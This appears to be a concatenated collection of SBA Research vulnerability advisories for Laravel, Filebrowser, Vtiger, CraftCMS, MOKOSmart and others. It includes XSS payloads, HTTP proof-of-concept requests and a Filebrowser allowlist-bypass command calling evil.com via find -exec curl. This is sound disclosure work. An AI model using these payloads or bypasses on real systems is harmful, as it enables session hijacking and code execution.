]] 70 | [...] 71 | ``` 72 | 73 | As the above code snippet shows, the parameter `userurl` contains user 74 | input and is output without performing any HTML escaping. 75 | 76 | ## Proof-of-Concept ## 77 | 78 | An attacker can exploit this vulnerability by manipulating the `userurl` 79 | query parameter: 80 | 81 | ```text 82 | http:///cgi-bin/hotspotlogin.cgi?res=failed&userurl="> 90 | 91 | 92 | 93 | ``` 94 | 95 | ## Timeline ## 96 | 97 | * `2018-04-10` identification of vulnerability in version RUT9XX_R_00.04.161 98 | * `2018-04-16` re-test of version RUT9XX_R_00.04.172 99 | * `2018-04-16` initial vendor contact through public address 100 | * `2018-04-18` vendor response with security contact 101 | * `2018-04-19` disclosed vulnerability to vendor security contact 102 | * `2018-04-26` vendor released fix in version RUT9XX_R_00.04.233 103 | * `2018-07-09` notify vendor about incomplete fix in version RUT9XX_R_00.05.00.5 104 | * `2018-07-19` vendor released fix in version RUT9XX_R_00.05.01.1 105 | * `2018-07-25` re-test of version RUT9XX_R_00.05.01.2 106 | * `2018-09-25` request CVE from MITRE 107 | * `2018-09-26` MITRE assigned CVE-2018-17533 108 | * `2018-10-11` public disclosure 109 | 110 | ## References ## 111 | 112 | * Firmware Changelog: 113 | 114 | ## Credits ## 115 | 116 | * David Gnedt ([SBA Research](https://www.sba-research.org/)) 117 | -------------------------------------------------------------------------------- /2024/SBA-ADV-20241209-02_Laravel_Reflected_XSS_via_Route_Parameter_in_Debug-Mode_Error_Page/README.md: -------------------------------------------------------------------------------- 1 | # Laravel Reflected XSS via Route Parameter in Debug-Mode Error Page # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible 6 | to reflected cross-site scripting due to an improper encoding of route 7 | parameters in the debug-mode error page. 
8 | 9 | * **Identifier** : SBA-ADV-20241209-02 10 | * **Type of Vulnerability** : Cross-Site Scripting 11 | * **Software/Product Name** : [Laravel Framework](https://github.com/laravel/framework) 12 | * **Vendor** : [Laravel Holdings Inc.](https://laravel.com/) 13 | * **Affected Versions** : between 11.9.0 and 11.35.1 14 | * **Fixed in Version** : 11.36.0 15 | * **CVE ID** : CVE-2024-13919 16 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N 17 | * **CVSS Base Score** : 8.0 (High) 18 | 19 | ## Vendor Description ## 20 | 21 | > Laravel is a web application framework with expressive, elegant syntax. 22 | 23 | Source: 24 | 25 | ## Impact ## 26 | 27 | This vulnerability allows attackers to execute JavaScript code in a user's 28 | browser within the origin of the affected web application. The user needs to 29 | access the attacker provided link and the web application needs to be in 30 | debug-mode (`APP_DEBUG=true`). 31 | 32 | ## Vulnerability Description ## 33 | 34 | When the debug mode is active via `APP_DEBUG=true` and the web application 35 | returns an error (HTTP status 5XX), an error page is returned. This page 36 | contains information about the request that triggered the error. The values 37 | in the URL path are embedded in the error page without proper encoding. 38 | 39 | The following code snippet shows the sink. The templating engine deactivates 40 | HTML-encoding for data passed via `{!! !!}`. 41 | 42 | ```html 43 |
44 |
45 | 49 |
{!! $routeParametersContext !!}
50 |
51 |
52 |
53 | ``` 54 | 55 | ## Proof of Concept ## 56 | 57 | ### Prerequisites ### 58 | 59 | First, let us make sure that the debug mode is activated ensuring that 60 | `APP_DEBUG=true` is set in the `.env` file. Second, add an endpoint that 61 | produces an error, e.g., division by zero. 62 | 63 | ```php 64 | 86 | 87 |
 88 |       {
 89 | "id": ""
 90 | }
 91 |     
92 |
93 |
94 | ``` 95 | 96 | As the `id` value is not embedded with proper encoding, the browser 97 | interprets it as HTML, executes the injected JavaScript code and, therefore, 98 | opens an alert. 99 | 100 | ## Recommended Countermeasures ## 101 | 102 | If possible upgrade to the fixed version 11.36.0 or above. 103 | If you are unable to upgrade, ensure that the application does not run in 104 | debug-mode by setting `APP_DEBUG=false` in your configuration. 105 | 106 | ## Timeline ## 107 | 108 | * `2024-11-28` Identified the vulnerability in version 11.34.1 109 | * `2024-12-09` Initial contact attempt and disclosure of vulnerability to 110 | Laravel's security contact 111 | * `2024-12-13` Security patch was merged 112 | * `2024-12-14` Contacted Jeremy Angele (@angelej) who independently 113 | discovered the vulnerability and submitted the patch to fix it 114 | * `2024-12-17` Laravel project releases fixed version 11.36.0 115 | * `2025-02-05` Second attempt to contact Laravel's security contact 116 | * `2025-03-10` No reaction from Laravel's security contact to all previous 117 | contact attempts 118 | * `2025-03-10` SBA Research assigned CVE-2024-13919 119 | * `2025-03-10` Public disclosure 120 | 121 | ## References ## 122 | 123 | * Security Patch: 124 | 125 | ## Credits ## 126 | 127 | * Fabian Funder ([SBA Research](https://www.sba-research.org/)) 128 | * Philipp Adelsberger ([SBA Research](https://www.sba-research.org/)) 129 | -------------------------------------------------------------------------------- /2024/SBA-ADV-20241209-01_Laravel_Reflected_XSS_via_Request_Parameter_in_Debug-Mode_Error_Page/README.md: -------------------------------------------------------------------------------- 1 | # Laravel Reflected XSS via Request Parameter in Debug-Mode Error Page # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The Laravel framework versions between 11.9.0 and 11.35.1 are susceptible 6 | to reflected cross-site scripting due to an improper encoding of request 7 | 
parameters in the debug-mode error page.

* **Identifier** : SBA-ADV-20241209-01
* **Type of Vulnerability** : Cross-Site Scripting
* **Software/Product Name** : [Laravel Framework](https://github.com/laravel/framework)
* **Vendor** : [Laravel Holdings Inc.](https://laravel.com/)
* **Affected Versions** : between 11.9.0 and 11.35.1
* **Fixed in Version** : 11.36.0
* **CVE ID** : CVE-2024-13918
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N
* **CVSS Base Score** : 8.0 (High)

## Vendor Description ##

> Laravel is a web application framework with expressive, elegant syntax.

Source:

## Impact ##

This vulnerability allows attackers to execute JavaScript code in a user's
browser within the origin of the affected web application. The user needs to
access the attacker-provided link and the web application needs to be in
debug mode (`APP_DEBUG=true`).

## Vulnerability Description ##

When debug mode is active via `APP_DEBUG=true` and the web application
returns an error (HTTP status 5XX), an error page is returned. This page
contains information about the request that triggered the error. The values
in the URL parameters and in the request body are embedded in the error page
without proper encoding.

The following code snippet shows the sink. The templating engine deactivates
HTML encoding for data passed via `{!! !!}`.

```html
{!! $exception->requestBody() ?: 'No body data' !!}
```

## Proof of Concept ##

### Prerequisites ###

First, make sure that debug mode is activated by ensuring that
`APP_DEBUG=true` is set in the `.env` file. Second, add an endpoint that
produces an error, e.g., division by zero.

alert(1)` the
`poc-url` function is executed, a division by zero exception is thrown,
causing the webserver to respond with a `500 Internal Server Error`. An
error page is generated containing the following HTML code.

```html
 89 |       {
 90 | "payload": ""
 91 | }
 92 |     
93 |
94 |
95 | ``` 96 | 97 | As the `payload` value is not embedded with proper encoding, the browser 98 | interprets it as HTML, executes the injected JavaScript code and, therefore, 99 | opens an alert. 100 | 101 | ## Recommended Countermeasures ## 102 | 103 | If possible upgrade to the fixed version 11.36.0 or above. 104 | If you are unable to upgrade, ensure that the application does not run in 105 | debug-mode by setting `APP_DEBUG=false` in your configuration. 106 | 107 | ## Timeline ## 108 | 109 | * `2024-11-28` Identified the vulnerability in version 11.34.1 110 | * `2024-12-09` Initial contact attempt and disclosure of vulnerability to 111 | Laravel's security contact 112 | * `2024-12-13` Security patch was merged 113 | * `2024-12-14` Contacted Jeremy Angele (@angelej) who independently 114 | discovered the vulnerability and submitted the patch to fix it 115 | * `2024-12-17` Laravel project releases fixed version 11.36.0 116 | * `2025-02-05` Second attempt to contact Laravel's security contact 117 | * `2025-03-10` No reaction from Laravel's security contact to all previous 118 | contact attempts 119 | * `2025-03-10` SBA Research assigned CVE-2024-13918 120 | * `2025-03-10` Public disclosure 121 | 122 | ## References ## 123 | 124 | * Security Patch: 125 | 126 | ## Credits ## 127 | 128 | * Fabian Funder ([SBA Research](https://www.sba-research.org/)) 129 | * Philipp Adelsberger ([SBA Research](https://www.sba-research.org/)) 130 | -------------------------------------------------------------------------------- /2025/SBA-ADV-20250326-02_Filebrowser_Shell_Commands_Can_Spawn_Other_Commands/README.md: -------------------------------------------------------------------------------- 1 | # Filebrowser Shell Commands Can Spawn Other Commands # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The *Command Execution* feature of Filebrowser only allows the execution of 6 | shell command which have been predefined on a user-specific allowlist. 
Many 7 | tools allow the execution of arbitrary different commands, rendering this 8 | limitation void. 9 | 10 | * **Identifier** : SBA-ADV-20250326-02 11 | * **Type of Vulnerability** : Shell Commands Can Spawn Other Commands 12 | * **Software/Product Name** : [Filebrowser](https://filebrowser.org/) 13 | * **Vendor** : [Filebrowser](https://github.com/filebrowser) 14 | * **Affected Versions** : <= 2.34.2 15 | * **Fixed in Version** : Not yet 16 | * **CVE ID** : CVE-2025-52903 17 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H 18 | * **CVSS Base Score** : 8.0 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > filebrowser provides a file managing interface within a specified directory 23 | > and it can be used to upload, delete, preview, rename and edit your files. 24 | > It allows the creation of multiple users and each user can have its own 25 | > directory. It can be used as a standalone app. 26 | 27 | Source: 28 | 29 | ## Impact ## 30 | 31 | The concrete impact depends on the commands being granted to the attacker, 32 | but the large number of standard commands allowing the execution of 33 | subcommands makes it likely that every user having the `Execute commands` 34 | permissions can exploit this vulnerability. Everyone who can exploit it will 35 | have full code execution rights with the *uid* of the server process. 36 | 37 | ## Vulnerability Description ## 38 | 39 | Many Linux commands allow the execution of arbitrary different commands. For 40 | example, if a user is authorized to run only the `find` command and nothing 41 | else, this restriction can be circumvented by using the `-exec` flag. 42 | 43 | Some common commands having the ability to launch external commands and which 44 | are included in the official container image of Filebrowser are listed below. 
45 | The website gives a comprehensive overview: 46 | 47 | * 48 | * 49 | * 50 | * 51 | * 52 | 53 | As a prerequisite, an attacker needs an account with the `Execute Commands` 54 | permission and some permitted commands. 55 | 56 | ## Proof of Concept ## 57 | 58 | The following screenshot demonstrates, how this can be used to issue a 59 | network call to an external server: 60 | 61 | ![Executing curl using find](images/execute_subcommand_with_find.png) 62 | 63 | ## Recommended Countermeasures ## 64 | 65 | Until this issue is fixed, we recommend to completely disable 66 | `Execute commands` for all accounts. Since the command execution is an 67 | inherently dangerous feature that is not used by all deployments, it should 68 | be possible to completely disable it in the application's configuration. 69 | 70 | The `prlimit` command can be used to prevent the execution of subcommands: 71 | 72 | ```bash 73 | $ find . -exec curl http://evil.com {} \; 74 | 75 | 76 | [...] 77 | 78 | $ prlimit --nproc=0 find . -exec curl http://evil.com {} \; 79 | find: cannot fork: Resource temporarily unavailable 80 | ``` 81 | 82 | It should be prepended to any command executed in the context of the 83 | application. `prlimit` can be used for containerized deployments as well as 84 | for bare-metal ones. 85 | 86 | WARNING: Note that this does prevent any unexpected behavior from the 87 | authorized command. For example, the `find` command can also delete files 88 | directly via its `-delete` flag. 89 | 90 | As a defense-in-depth measure, Filebrowser should provide an additional 91 | container image based on a *distroless* base image. 
92 | 93 | ## Timeline ## 94 | 95 | * `2025-03-26` Identified the vulnerability in version 2.32.0 96 | * `2025-04-11` Contacted the project 97 | * `2025-04-18` Vulnerability disclosed to the project 98 | * `2025-06-25` Uploaded advisories to the project's GitHub repository 99 | * `2025-06-26` CVE ID assigned by GitHub 100 | * `2025-06-26` Advisory published by project as `GHSA-3q2w-42mv-cph4`; the 101 | issue itself won't be fixed, but command execution has been disabled by 102 | default in version 2.33.8 as a workaround; GitHub issue #5199 opened to 103 | track the fix 104 | 105 | ## References ## 106 | 107 | * prlimit: 108 | * "Distroless" Container Images: 109 | * GitHub Security Advisory: 110 | * GitHub Issue: 111 | 112 | ## Credits ## 113 | 114 | * Mathias Tausig ([SBA Research](https://www.sba-research.org/)) 115 | -------------------------------------------------------------------------------- /2024/SBA-ADV-20240202-02_CraftCMS_Plugin_Two-Factor_Authentication_TOTP_Valid_After_Use/README.md: -------------------------------------------------------------------------------- 1 | # CraftCMS Plugin - Two-Factor Authentication - TOTP Token Stays Valid After Use # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | The CraftCMS plugin Two-Factor Authentication through 3.3.3 allows reuse of 6 | TOTP tokens multiple times within the validity period. 
7 | 8 | * **Identifier** : SBA-ADV-20240202-02 9 | * **Type of Vulnerability** : Improper Authentication 10 | * **Software/Product Name** : [Two-Factor Authentication](https://plugins.craftcms.com/two-factor-authentication?craft4) 11 | * **Vendor** : [Born05](https://www.born05.com/en/) 12 | * **Affected Versions** : <= 3.3.3 13 | * **Fixed in Version** : 3.3.4 14 | * **CVE ID** : CVE-2024-5658 15 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N 16 | * **CVSS Base Score** : 4.8 (Medium) 17 | 18 | ## Vendor Description ## 19 | 20 | > Craft 4 plugin for two-factor or two-step login using Time Based OTP (TOTP, 21 | > like Google Authenticator). 22 | 23 | Source: 24 | 25 | ## Impact ## 26 | 27 | An attacker who is in possession of an TOTP token is able to establish an 28 | authenticated session. This requires that the attacker has knowledge of the 29 | victim's credentials. 30 | 31 | ## Vulnerability Description ## 32 | 33 | A TOTP token can be used multiple times to establish an authenticated session. 34 | RFC 6238 insists that an OTP must not be used more than once [1]. 35 | 36 | > The verifier MUST NOT accept the second attempt of the OTP after the 37 | > successful validation has been issued for the first OTP, which ensures 38 | > one-time only use of an OTP. 39 | 40 | The OWASP Application Security Verification Standard v4.0.3 (ASVS) reiterates 41 | this property with requirement 2.8.4 [2]. 42 | 43 | > Verify that time-based OTP can be used only once within the validity period. 44 | 45 | ## Proof of Concept ## 46 | 47 | Start the login process in two different environments e.g. in two different 48 | browsers. Enter the same TOTP in both environments while making sure that 49 | both submissions are made in the timespan where the TOTP is valid. Both 50 | environments should display the dashboard, signaling that the authentication 51 | process has been successful. 52 | 53 | The following request and response pairs show this behavior. 
The requests are 54 | made from different session (different `CraftSessionId` and `identity` 55 | cookie), but yield the same response. Therefore, the one-time use requirement 56 | of TOTPs has been shown to be violated. 57 | 58 | Request and response 1: 59 | 60 | ```http 61 | POST /index.php?p=admin%2Factions%2Ftwo-factor-authentication%2Fverify%2Flogin-process HTTP/1.1 62 | Host: example.org 63 | Cookie: dc06c534a0efbcbec00d44ec8b36ae7a_identity=7facf57ff[...]; CraftSessionId=3f8122e456[...] 64 | [...] 65 | 66 | {"authenticationCode":"317415"} 67 | 68 | 69 | HTTP/1.1 200 OK 70 | Date: Tue, 06 Feb 2024 11:09:23 GMT 71 | [...] 72 | 73 | { 74 | "returnUrl":"https://example.org/admin/dashboard", 75 | [...] 76 | } 77 | ``` 78 | 79 | Request and response 2: 80 | 81 | ```http 82 | POST /index.php?p=admin%2Factions%2Ftwo-factor-authentication%2Fverify%2Flogin-process HTTP/1.1 83 | Host: example.org 84 | Cookie: dc06c534a0efbcbec00d44ec8b36ae7a_identity=830fcd6c62[...]; CraftSessionId=3fbfbf904c[...] 85 | 86 | {"authenticationCode":"317415"} 87 | 88 | 89 | HTTP/1.1 200 OK 90 | Date: Tue, 06 Feb 2024 11:09:25 GMT 91 | [...] 92 | 93 | { 94 | "returnUrl":"https://example.org/admin/dashboard", 95 | [...] 96 | } 97 | ``` 98 | 99 | ## Recommended Countermeasures ## 100 | 101 | We recommend to update to version 3.3.4 or later, which applies the following 102 | countermeasure. 103 | 104 | We suggest that TOTPs should loose their validity after they have been used. 105 | In order to accomplish this a blocklist could be implemented where TOTPs used 106 | by a particular user are logged. This list must be periodically cleaned up to 107 | prevent collisions. 
108 | 109 | ## Timeline ## 110 | 111 | * `2024-02-02`: Identified the vulnerability in version 3.3.2 112 | * `2024-02-04`: Contacted the Maintainer 113 | * `2024-02-05`: Vulnerability disclosed to the Maintainer 114 | * `2024-02-07`: Requested CVE from MITRE 115 | * `2024-02-08`: Maintainer released version 3.3.3 which is still vulnerable 116 | * `2024-02-08`: Maintainer fixed the vulnerability in version 3.3.4 117 | * `2024-06-04`: SBA Research becomes a CNA 118 | * `2024-06-05`: SBA Research assigned CVE-2024-5658 119 | * `2024-06-06`: Public disclosure 120 | 121 | ## References ## 122 | 123 | 1. RFC 6238. TOTP Time-Based One-Time Password Algorithm: 124 | 2. OWASP Application Security Verification Standard (ASVS) v4.0.3. Requirement 2.8.4 Verify that time-based OTP can be used only once within the validity period: 125 | 126 | ## Credits ## 127 | 128 | * Fabian Funder ([SBA Research](https://www.sba-research.org/)) 129 | * Jakob Pachmann ([SBA Research](https://www.sba-research.org/)) 130 | -------------------------------------------------------------------------------- /2022/SBA-ADV-20220120-01_MOKOSmart_MKGW1_Gateway_Improper_Session_Management/README.md: -------------------------------------------------------------------------------- 1 | # MOKOSmart MKGW1 Gateway Improper Session Management # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | MOKOSmart MKGW1 Gateway devices with firmware version 1.1.1 do 6 | not provide an adequate session management for the administrative web 7 | interface. This allows adjacent attackers with access to the management 8 | network to read and modify the configuration of the device. 
9 | 10 | * **Identifier** : SBA-ADV-20220120-01 11 | * **Type of Vulnerability** : Improper Authentication 12 | * **Software/Product Name** : [MOKOSmart MKGW1 BLE Gateway](https://www.mokosmart.com/mokosmart-mkgw1-gateway-iot-cloud-platform/) 13 | * **Vendor** : [MOKO TECHNOLOGY LTD](https://www.mokosmart.com/) 14 | * **Affected Versions** : 1.1.1 15 | * **Fixed in Version** : Not yet 16 | * **CVE ID** : CVE-2023-51059 17 | * **CVSS Vector** : CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H 18 | * **CVSS Base Score** : 8.0 (High) 19 | 20 | ## Vendor Description ## 21 | 22 | > * MKGW1 Bluetooth gateway is mainly used for the MOKO Bluetooth products. 23 | > * It is convenient for users to get the data of the MOKO series Beacon, 24 | > and advertising raw data of any Bluetooth device. 25 | > * It can upload the data to the server via MQTT (V3.1.1) or HTTP(S) 26 | > protocol. 27 | > * MKGW1 was developed with MediaTek® MT7688AN relying on OpenWrt system 28 | > and Nordic® nRF52 platform. 29 | > * MKGW1 can connect the standard MQTT Broker, Aws IOT, Azure IOT HUB, 30 | > Aliyun IOT. 31 | 32 | Source: 33 | 34 | ## Impact ## 35 | 36 | By exploiting the documented vulnerability, an attacker can gain 37 | administrative access to the device. For example, this can be misused by 38 | altering the configuration of the device or by reading out the configured 39 | network credentials and therefore getting a foothold in the victim's network. 40 | 41 | ## Vulnerability Description ## 42 | 43 | The gateway offers a web-based configuration interface that can be used to 44 | edit the configuration of the gateway. Username and password are requested 45 | to authenticate the administrator. After sending the correct credentials the 46 | device sets a global server-side state to "logged in" for 3600 seconds, 47 | rather than issuing a session ID. 
Now any device on the same network can 48 | access the configuration interface as administrator without any additional 49 | authentication and read and modify the configuration. 50 | 51 | ## Proof of Concept ## 52 | 53 | Login with the admin credentials on the web interface from a legitimate 54 | client: 55 | 56 | HTTP request: 57 | 58 | ```http 59 | POST /goform/login HTTP/1.1 60 | Host: 192.168.22.1 61 | Content-Type: application/json 62 | Content-Length: 39 63 | Origin: http://192.168.22.1 64 | Connection: close 65 | Referer: http://192.168.22.1/sign_in 66 | 67 | {"username":"Admin","password":"[redacted]"} 68 | ``` 69 | 70 | HTTP response: 71 | 72 | ```http 73 | HTTP/1.1 200 OK 74 | Content-type: application/json 75 | Pragma: no-cache 76 | Cache-Control: no-cache 77 | 78 | { "state": { "code": 2000, "msg": "ok" }, "data": { "activetime": "3600" } } 79 | ``` 80 | 81 | The response shown above does not contain any session identifier. 82 | On another client that can reach the web interface, an attacker can read out 83 | the configuration without any authentication: 84 | 85 | HTTP request: 86 | 87 | ```http 88 | GET /goform/get_wan HTTP/1.1 89 | Host: 192.168.22.1 90 | Connection: close 91 | ``` 92 | 93 | HTTP response: 94 | 95 | ```http 96 | HTTP/1.1 200 OK 97 | Content-type: application/json 98 | 99 | { "state": { "code": 2000, "msg": "ok" }, "data": { "wanmode": "WIFI", "wanssid": "[redacted]", "wanencrypt": "[redacted]", "wanpassword": "[redacted]", "proto": "dhcp", "ipaddr": "", "netmask": "", "gateway": "", "firdns": "", "secdns": "" } } 100 | ``` 101 | 102 | The above proof-of-concept shows that the MOKO gateway cannot distinguish 103 | between multiple sessions. Therefore, if a legitimate client is logged in, 104 | an attacker can read the configuration. Furthermore, an attacker can also 105 | modify the configuration by sending the appropriate `JSON` data to the 106 | respective `POST` endpoint. 
Changes to the network can trigger a reboot 107 | of the device. 108 | 109 | ## Recommended Countermeasures ## 110 | 111 | We are not aware of a vendor fix yet. Please contact the vendor. 112 | 113 | We recommend to implement a proper session management for the 114 | administrative web interface of the device. 115 | 116 | ## Timeline ## 117 | 118 | * `2022-01-20`: identification of vulnerability in version 1.1.1 119 | * `2022-01-27`: initial vendor contact 120 | * `2022-03-02`: disclosed vulnerability to vendor contact but received no reply 121 | * `2023-12-11`: request CVE from MITRE 122 | * `2023-12-12`: public disclosure 123 | * `2024-01-09`: MITRE assigned CVE-2023-51059 124 | 125 | ## References ## 126 | 127 | * [Moko Gateway Documentation](https://www.mokosmart.com/wp-content/uploads/2019/10/GS-gateway.pdf) 128 | 129 | ## Credits ## 130 | 131 | * Jakob Hagl ([SBA Research](https://www.sba-research.org/)) 132 | * David Lisa Gnedt ([SBA Research](https://www.sba-research.org/)) 133 | -------------------------------------------------------------------------------- /2022/SBA-ADV-20220328-01_Vtiger_CRM_Stored_Cross-Site_Scripting/README.md: -------------------------------------------------------------------------------- 1 | # Vtiger CRM Stored Cross-Site Scripting # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Vtiger CRM 7.4.0 or below is prone to a stored cross-site scripting 6 | vulnerability in the email templates module due to insufficient sanitizing. 
7 | 8 | * **Identifier** : SBA-ADV-20220328-01 9 | * **Type of Vulnerability** : Cross Site Scripting 10 | * **Software/Product Name** : [Vtiger CRM](https://code.vtiger.com/vtiger/vtigercrm) 11 | * **Vendor** : [Vtiger](https://www.vtiger.com/) 12 | * **Affected Versions** : <= 7.4.0 13 | * **Fixed in Version** : Not yet 14 | * **CVE ID** : CVE-2022-38335 15 | * **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N 16 | * **CVSS Base Score** : 7.6 (High) 17 | 18 | ## Vendor Description ## 19 | 20 | > Vtiger is a PHP based web application that enables businesses to increase 21 | > sales wins, marketing ROI, and support satisfaction by providing tools for 22 | > employees and management work more effectively, capture more data, and 23 | > derive new actionable insights from across the customer lifecycle. 24 | 25 | Source: 26 | 27 | ## Impact ## 28 | 29 | An authenticated attacker with the "Email Templates"-module privilege is able 30 | to insert JavaScript into email templates, which is triggered when a victim 31 | views the template. 32 | In the worst case, the victim's session could be hijacked and the attacker is 33 | able to perform actions in the victim's context. 34 | This could lead to privilege escalation if the victim is more privileged than 35 | the attacker (for example an admin). 36 | 37 | ## Vulnerability Description ## 38 | 39 | The following code snippet (`./modules/Emails/models/Mailer.php`) shows the 40 | function which should ensure that JavaScript is removed from the user input: 41 | 42 | ```php 43 | [...] 44 | public static function getProcessedContent($content) { 45 | // remove script tags from whole html content 46 | $processedContent = preg_replace('#(.*?)#is', '', $content); 47 | $processedContent = purifyHtmlEventAttributes($processedContent,TRUE); 48 | return $processedContent; 49 | } 50 | [...] 51 | ``` 52 | 53 | However, the regex `#(.*?)#is` is insufficient for 54 | sanitizing JavaScript. 
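The same root cause runs through the Laravel debug page (`{!! !!}` disables encoding), the Vtiger email template (a blocklist regex instead of encoding) and the WordPress plugin advisory that follows (placeholders substituted without escaping): untrusted text reaches an HTML context unencoded. As an added example that is not code from any of these projects, the block below places the raw interpolation the vulnerable sinks perform beside a renderer that HTML-encodes each value for the context it lands in. The request data is constructed; the payloads are the ones these advisories show, and the function names are this example's own.

```python
# Added example (not Laravel's, Vtiger's or the plugin's code): the raw
# interpolation the vulnerable sinks perform, beside a renderer that
# HTML-encodes every untrusted value for the context it lands in.
import html
import json
from typing import Dict

# Constructed inputs modelled on the advisories above.
QUERY = {"id": "<script>alert(1)</script>"}                            # route/request parameter
BODY = json.dumps({"payload": "<script>alert(1)</script>"}, indent=2)  # JSON request body
TITLE = "test_aiosp_title&<>\"';<script src='data:text/javascript,alert(1)'></script>"


def render_unsafe(query: Dict[str, str], body: str) -> str:
    """Equivalent of `{!! ... !!}`: values are dropped into the page as-is."""
    items = "".join(f"<li>{k}={v}</li>" for k, v in query.items())
    return f"<ul>{items}</ul>\n<pre>{body}</pre>"


def render_safe(query: Dict[str, str], body: str) -> str:
    """Hardened renderer: html.escape(quote=True) encodes & < > " and '.

    That is sufficient for element content and for double-quoted attribute
    values; a value going into a script or URL context would need a different
    encoder, so debug data is kept out of those contexts entirely.
    """
    items = "".join(
        f'<li data-name="{html.escape(k, quote=True)}">'
        f"{html.escape(k, quote=True)}={html.escape(v, quote=True)}</li>"
        for k, v in query.items()
    )
    return f"<ul>{items}</ul>\n<pre>{html.escape(body, quote=True)}</pre>"


def leaks_markup(rendered: str) -> bool:
    """True if a tag from the input survived into the rendered page."""
    return "<script" in rendered.lower()


def roundtrip_ok(value: str) -> bool:
    """Encoding must be lossless: the browser shows exactly what was submitted."""
    return html.unescape(html.escape(value, quote=True)) == value


if __name__ == "__main__":
    print(render_unsafe(QUERY, BODY))
    print(render_safe(QUERY, BODY))
```

Encoding on output, rather than stripping on input, is what makes the debug page still display the offending request verbatim (useful for the developer reading it) while the browser treats it as text. The blocklist approach in `getProcessedContent` has to anticipate every way script can be expressed; the encoder does not.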

## Proof of Concept ##

If the attacker inserts the payload `a`
* Description: `test_aiosp_desc&<>"'; pt:%post_title% wp_title:%wp_title% bd:%blog_description% sd:%site_description% bt: %blog_title% st: %site_title% desc:%description%`

When the post is saved and accessed later, the JavaScript alert popup will be shown.
The resulting HTML page will contain the following code (shortened for readability):

```html
[...]
test_aiosp_title&<>"';<script src='data:text/javascript,alert(1)'></script> | XXXXXXX


wp_title:test_aiosp bd: sd: bt: XXXXXXX st: XXXXXXX desc:%description%" />
[...]
```

## Recommended Countermeasures ##

We recommend properly escaping the output by applying the encoding functions provided by WordPress,
like the `esc_*` or `wp_kses_*` [functions][1], after all placeholders have been substituted.

[1]: https://developer.wordpress.org/themes/theme-security/data-sanitization-escaping/#escaping-securing-output

## Timeline ##

* `2019-09-09` Identified the vulnerability
* `2019-09-10` Contacted vendor
* `2019-09-10` Response by vendor about disclosure contact
* `2019-09-10` Vulnerability disclosed to vendor
* `2019-09-10` Vulnerability verified by vendor
* `2019-09-10` Vulnerability fixed by vendor, public disclosure coordinated
* `2019-09-20` CVE assigned
* `2019-10-16` Public disclosure

## References ##

*
*
*
*

## Credits ##

* Tobias Fink ([SBA Research](https://www.sba-research.org/))

--------------------------------------------------------------------------------
/2025/SBA-ADV-20250326-01_Filebrowser_Command_Execution_Not_Limited_To_Scope/README.md:
--------------------------------------------------------------------------------

# Filebrowser Command Execution not Limited to Scope #

## Vulnerability Overview ##

In the web application, all users have a *scope* assigned, and they only have
access to the files within that *scope*. The *Command Execution* feature of
Filebrowser allows the execution of shell commands which are not restricted
to the scope, potentially giving an attacker read and write access to all
files managed by the server.

* **Identifier** : SBA-ADV-20250326-01
* **Type of Vulnerability** : Command Execution not Limited to Scope
* **Software/Product Name** : [Filebrowser](https://filebrowser.org/)
* **Vendor** : [Filebrowser](https://github.com/filebrowser)
* **Affected Versions** : <= 2.34.2
* **Fixed in Version** : Not yet
* **CVE ID** : CVE-2025-52904
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
* **CVSS Base Score** : 8.0 (High)

## Vendor Description ##

> filebrowser provides a file managing interface within a specified directory
> and it can be used to upload, delete, preview, rename and edit your files.
> It allows the creation of multiple users and each user can have its own
> directory. It can be used as a standalone app.

Source:

## Impact ##

Shell commands are executed with the *uid* of the server process without any
further restrictions. This means that they will have access to at least

* all files managed by the application from all *scopes*, even those the user
  does not have access to in the GUI.
* the Filebrowser database file containing the password hashes of all accounts.

The concrete impact depends on the commands granted to the attacker,
but due to other vulnerabilities identified ("Bypass Command Execution
Allowlist", "Shell Commands Can Spawn Other Commands", "Insecure File
Permissions") it is likely that full read and write access will exist.

Read access to the database means that the attacker is capable of extracting
all user password hashes. This enables an offline dictionary attack on the
passwords of all accounts, though the choice of the password hash function
(*bcrypt* with a cost factor of 10) gives strong protection against such
attacks. Write access to the database means that attackers are capable of
changing a user's password hash, allowing them to impersonate any user
account, including an administrator.

## Vulnerability Description ##

Shell commands executed by a user are created as a simple subprocess of the
application without any further restrictions. That means that they have full
access to files accessible by the application. The *scope* that is assigned
to every account is not considered.

As a prerequisite, an attacker needs an account with the `Execute Commands`
permission and some permitted commands.

## Proof of Concept ##

Any exploit highly depends on the commands granted to the attacker. The
following screenshot shows how all password hashes can be extracted using
only the `grep` command:

![Reading the password hashes using the "grep" command](images/commandexecution_readpasswordhashes.png)

## Recommended Countermeasures ##

Until this issue is fixed, we recommend completely disabling
`Execute commands` for all accounts. Since command execution is an
inherently dangerous feature that is not used by all deployments, it should
be possible to completely disable it in the application's configuration. As a
defense-in-depth measure, organizations not requiring command execution
should operate Filebrowser from a *distroless* container image.

There are two approaches to fixing this issue:

1. Limiting the process when it is started, e.g., by using *user namespaces*
   with a tool like *Bubblewrap*. If this path is chosen, it is important to
   use a method that works both on a bare-metal server and within an
   unprivileged container.
2. Re-architecting the command execution feature so that files in the various
   *scopes* have a distinct *uid* as an owner and all shell commands are
   executed under the *uid* of the user's *scope*.

## Timeline ##

* `2025-03-26` Identified the vulnerability in version 2.32.0
* `2025-04-11` Contacted the project
* `2025-04-18` Vulnerability disclosed to the project
* `2025-06-25` Uploaded advisories to the project's GitHub repository
